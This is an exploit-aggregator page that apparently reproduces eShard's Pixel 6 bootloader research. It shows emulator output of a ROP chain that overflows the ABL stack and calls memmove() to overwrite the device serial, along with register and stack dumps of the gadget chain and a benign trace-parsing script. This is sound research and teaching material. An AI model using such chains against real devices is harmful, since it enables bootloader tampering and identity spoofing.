## https://sploitus.com/exploit?id=FDF8A206-EAB1-5C03-BF73-61095BBB3EEA
# Updating ABL serial with ROP

When run, this notebook loads ABL and attempts to update the device's serial number with a ROP chain that calls memmove(). It is derived from eShard's https://github.com/eshard/pixel6-boot/blob/main/run_abl_public.ipynb and follows along with https://eshard.com/posts/pixel6_bootloader

# Output

```
partition misc not found
failed to read misc(vendor) partition -2
[   0.000000] [E] [PXL] could not get charger state -27
[   0.000000] [I] [PXL] boot voltage threshold=3400mV

##### INTERRUPT
0xffff0000f880d3e0:	mov	x20, x0
^ Got interrupt 0d ffff0000f880d3e0. Skipping instruction.


start_app hook:
0xffff0000f88105a0:	ret	

fastboot_menu_start hook:
0xffff0000f887be94:	ret	


>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:flashing unlock
<<< INFOdevice already unlocked
<<< OKAY
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:oem dmesg
<<< OKAY
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:getvar:serialno
<<< OKAYDAAAAABBBBAAAAAA
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:
<<< FAILvariable (serialnoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>> Exiting

0xffff0000f8815a84:	mov	sp, x29
0xffff0000f8815a88:	ldp	x20, x19, [sp, #0x30]
0xffff0000f8815a8c:	ldp	x22, x21, [sp, #0x20]
0xffff0000f8815a90:	ldp	x24, x23, [sp, #0x10]
0xffff0000f8815a94:	ldp	x29, x30, [sp], #0x40
0xffff0000f8815a98:	ret	
 
## REGISTERS ##
X0 -        0
X1 -       40
X2 - FFFF0001047FEEF0
X3 -        0
X8 -        0
X19 - DEADBEEFDEADBE19
X20 - DEADBEEFDEADBA20
X21 - 4343434343434343
X22 - 4343434343434343
X23 - 4343434343434343
X24 - 4343434343434343
X28 -        0
X29 - 4444444444444444
X30 - FFFF0000F880C924
SP - FFFF000090700040
PC - FFFF0000F8815A98

## STACK DUMP ##
SP: ffff000090700040
@ffff000090700040 deadbeefdeadbe29 - #0
@ffff000090700048 ffff0000f8884684 - #8
@ffff000090700050 deadbeefdeadbe24 - #10
@ffff000090700058 ffff000090700070 - #18
@ffff000090700060 ffff0000f887e2d4 - #20
@ffff000090700068 ffff0000f8ac0058 - #28
@ffff000090700070 10 - #30
@ffff000090700078 deadbeefdeadb119 - #38
@ffff000090700080 ffff000090700090 - #40
@ffff000090700088 ffff0000f886fb88 - #48
 
Checking serial: DAAAAABBBBAAAAAA

0xffff0000f880c924:	ldp	x20, x19, [sp, #0x30]
0xffff0000f880c928:	ldp	x22, x21, [sp, #0x20]
0xffff0000f880c92c:	ldp	x24, x23, [sp, #0x10]
0xffff0000f880c930:	ldp	x29, x30, [sp], #0x40
0xffff0000f880c934:	ret	
 
## REGISTERS ##
X0 -        0
X1 -       40
X2 - FFFF0001047FEEF0
X3 -        0
X8 -        0
X19 - DEADBEEFDEADB119
X20 -       10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 -        0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884684
SP - FFFF000090700080
PC - FFFF0000F880C934

## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
 
Checking serial: DAAAAABBBBAAAAAA

0xffff0000f8884684:	ldr	x1, [x23, #0x10]
0xffff0000f8884688:	mov	x0, x21
0xffff0000f888468c:	mov	x2, x20
0xffff0000f8884690:	blr	x22
 
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 -       10
X3 -        0
X8 -        0
X19 - DEADBEEFDEADB119
X20 -       10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 -        0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884684
SP - FFFF000090700080
PC - FFFF0000F8884690

## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
 
Checking serial: DAAAAABBBBAAAAAA

0xffff0000f887e2d4:	bl	#0xffff0000f8876b58
 
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 -       10
X3 -        0
X8 -        0
X19 - DEADBEEFDEADB119
X20 -       10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 -        0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884694
SP - FFFF000090700080
PC - FFFF0000F887E2D4

## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
 
Checking serial: DAAAAABBBBAAAAAA

0xffff0000f887e2d8:	mov	w0, wzr
0xffff0000f887e2dc:	ldp	x29, x30, [sp], #0x10
0xffff0000f887e2e0:	ret	
 
## REGISTERS ##
X0 -        0
X1 - FFFF000090700090
X2 -       10
X3 -        0
X8 - FFFF0000F8AC0058
X19 - DEADBEEFDEADB119
X20 -       10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 -        0
X29 - FFFF000090700090
X30 - FFFF0000F886FB88
SP - FFFF000090700090
PC - FFFF0000F887E2E0

## STACK DUMP ##
SP: ffff000090700090
@ffff000090700090 5245535f4c495645 - #0
@ffff000090700098 504f525f4c4149 - #8
@ffff0000907000a0 0 - #10
@ffff0000907000a8 0 - #18
@ffff0000907000b0 0 - #20
@ffff0000907000b8 0 - #28
@ffff0000907000c0 0 - #30
@ffff0000907000c8 0 - #38
@ffff0000907000d0 0 - #40
@ffff0000907000d8 0 - #48
 
Checking serial: EVIL_SERIAL_ROP

>>> PC = 0x0
```
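To make the trace above easier to read, here is an added example (not part of the notebook or eShard's code) that parses the register and stack dump at the `blr x22` call site and reassembles the bytes that memmove() copies, using the AArch64 calling convention (x0 = destination, x1 = source, x2 = length). The trace excerpt embedded below is copied from the output above; the function names are assumptions of this example.

```python
import re

# Excerpt of the emulator trace at the `blr x22` call site, copied from the
# page's output and embedded here so the script runs offline.
TRACE = """\
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 -       10
X22 - FFFF0000F887E2D4
PC - FFFF0000F8884690

## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
"""

REG_RE = re.compile(r"^(X\d+|SP|PC) -\s+([0-9A-Fa-f]+)$", re.M)
STACK_RE = re.compile(r"^@([0-9a-f]+) ([0-9a-f]+) - #", re.M)

def parse_registers(trace):
    """Map register name -> value from the '## REGISTERS ##' section."""
    return {name: int(val, 16) for name, val in REG_RE.findall(trace)}

def parse_stack(trace):
    """Map slot address -> 64-bit value from the '## STACK DUMP ##' section."""
    return {int(a, 16): int(v, 16) for a, v in STACK_RE.findall(trace)}

def read_bytes(stack, addr, length):
    """Reassemble `length` bytes at `addr` from 8-byte little-endian stack slots."""
    out = bytearray()
    while len(out) < length:
        slot = addr & ~7                      # slot holding this address
        if slot not in stack:
            raise KeyError(f"stack slot {slot:#x} not in dump")
        out += stack[slot].to_bytes(8, "little")[addr - slot:]
        addr = slot + 8
    return bytes(out[:length])

def decode_memmove_call(trace):
    """Return (dst, src, n, copied_bytes) for memmove(x0, x1, x2) at this point."""
    regs, stack = parse_registers(trace), parse_stack(trace)
    dst, src, n = regs["X0"], regs["X1"], regs["X2"]
    return dst, src, n, read_bytes(stack, src, n)

if __name__ == "__main__":
    dst, src, n, data = decode_memmove_call(TRACE)
    print(f"memmove({dst:#x}, {src:#x}, {n:#x}) copies {data!r}")
```

The copied bytes decode to the NUL-terminated string the final `Checking serial:` line reports, which is a quick way to confirm what the chain actually wrote before trusting the trace.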